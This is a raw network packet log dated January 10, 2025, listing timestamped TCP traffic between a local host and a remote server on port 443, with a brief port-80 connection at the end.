Jan 10, 2025 17:17:29.747096062 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.747150898 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.747668982 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.747720957 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.752871990 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.752938986 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.752959967 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.753005981 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.753012896 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.753063917 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.757843971 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.757903099 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.757919073 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.757977009 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.762800932 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.762881041 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.762903929 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.762954950 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.767543077 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.767612934 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.767636061 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.767680883 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.772197008 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.772253036 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.772262096 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.772305965 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.776842117 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.776920080 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.776932955 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.776978970 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.781418085 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.781491995 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.781512976 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.781558037 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.786164045 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.786221981 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.786237955 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.786283970 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.790822029 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.790888071 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.790894985 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.790939093 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.795506001 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.795574903 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.795583010 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.795624018 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.800116062 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.800177097 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.800184011 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.800225019 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.804816961 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.804872036 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.804889917 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.804944038 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.809379101 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.809434891 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.809442043 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.809479952 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.809484005 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.809492111 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.809541941 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.813276052 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.813332081 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.813338041 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.813380957 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.817176104 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.817228079 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.817234039 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.817282915 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.821054935 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.821121931 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.821129084 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.821171045 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.824836016 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.824911118 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.824923992 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.824969053 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.828583956 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.828640938 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.828658104 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.828706980 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.832004070 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.832067966 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.832082987 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.832128048 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.835724115 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.835779905 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.835798979 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.835841894 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.839230061 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.839307070 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.839334011 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.839392900 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.841393948 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.841454983 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.841470003 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.841514111 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.843571901 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.843638897 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.843647003 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.843688011 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.845709085 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.845767021 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.845772982 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.845814943 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.847965956 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.848028898 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.848032951 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.848077059 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.850096941 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.850147963 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.850152969 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.850193977 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.852447987 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.852495909 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.852504969 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.852551937 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.854366064 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.854424000 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.854434967 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.854475021 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.856672049 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.856726885 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.856730938 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.856769085 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.858730078 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.858778954 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.858788013 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.858830929 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.860816956 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.860868931 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.860878944 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.860923052 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.863117933 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.863166094 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.863174915 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.863215923 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.865072012 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.865123034 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.865158081 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.865200043 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.867182016 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.867232084 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.867245913 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.867294073 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.869343042 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.869400024 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.869416952 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.869465113 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.871439934 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.871491909 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.871510983 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.871558905 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.873426914 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.873483896 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.873497963 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.873543024 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.875513077 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.875593901 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.875603914 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.875647068 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.877651930 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.877717972 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.877724886 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.877770901 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.879597902 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.879651070 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.879657030 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.879700899 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.881591082 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.881649017 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.881655931 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.881696939 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.883778095 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.883826971 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.883832932 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.883871078 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.885622978 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.885679960 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.885684013 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.885726929 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.887521982 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.887578011 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.887583017 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.887629032 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.889494896 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.889556885 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.889563084 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.889605999 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.891467094 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.891522884 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.891531944 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.891575098 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.893457890 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.893513918 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.893526077 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.893573046 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.895328045 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.895381927 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.895381927 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.895395041 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.895430088 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.897264957 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.897331953 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.897386074 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.897435904 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.899188042 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.899271011 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.899280071 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.899322033 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.901114941 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.901186943 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.901196957 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.901240110 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.903105974 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.903173923 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.903188944 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.903233051 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.904951096 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.905002117 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.905010939 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.905055046 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.906749964 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.906799078 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.906866074 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.906917095 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.908613920 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.908667088 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.908694029 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.908740044 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.910429001 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.910525084 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.910533905 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.910599947 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.912246943 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.912309885 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.912318945 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.912364960 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.914005995 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.914082050 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.914089918 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.914130926 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.915982962 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.916038036 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.916044950 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.916081905 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.917591095 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.917658091 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.917668104 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.917706966 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.919331074 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.919378996 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.919385910 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.919440985 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.921040058 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.921101093 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.921116114 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.921154022 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.922745943 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.922808886 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.922816038 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.922858953 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.925539970 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.925595999 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.925626993 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.925674915 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.926265955 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.926316977 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.926321983 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.926372051 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.927953005 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.928019047 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.928101063 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.928145885 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.930016041 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.930073023 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.930084944 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.930125952 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.930933952 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.930984020 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.930995941 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.931046963 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.932878017 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.932971954 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.932984114 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.933029890 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.933900118 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.933953047 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.933962107 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.934010029 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.935488939 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.935533047 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.935540915 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.935585976 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.936964989 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.937006950 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.937016010 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.937052011 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.937058926 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.937098980 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.938292027 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.938343048 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.938349962 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.938386917 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.939712048 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.939766884 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.939774990 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.939814091 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.941148043 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.941235065 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.941245079 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.941282988 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.943407059 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.943459034 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.943468094 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.943505049 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.945580006 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.945626020 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.945632935 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.945640087 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.945676088 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.945708036 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.945712090 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.945751905 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.949873924 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.949922085 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.949943066 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.949976921 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.949982882 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.950020075 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.950021982 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:29.950054884 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.950118065 CET	59371	443	192.168.2.7	142.250.186.129
Jan 10, 2025 17:17:29.950134993 CET	443	59371	142.250.186.129	192.168.2.7
Jan 10, 2025 17:17:30.228816986 CET	59372	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:30.233625889 CET	80	59372	132.226.8.169	192.168.2.7
Jan 10, 2025 17:17:30.233740091 CET	59372	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:30.233901024 CET	59372	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:30.238620043 CET	80	59372	132.226.8.169	192.168.2.7
Jan 10, 2025 17:17:31.071775913 CET	80	59372	132.226.8.169	192.168.2.7
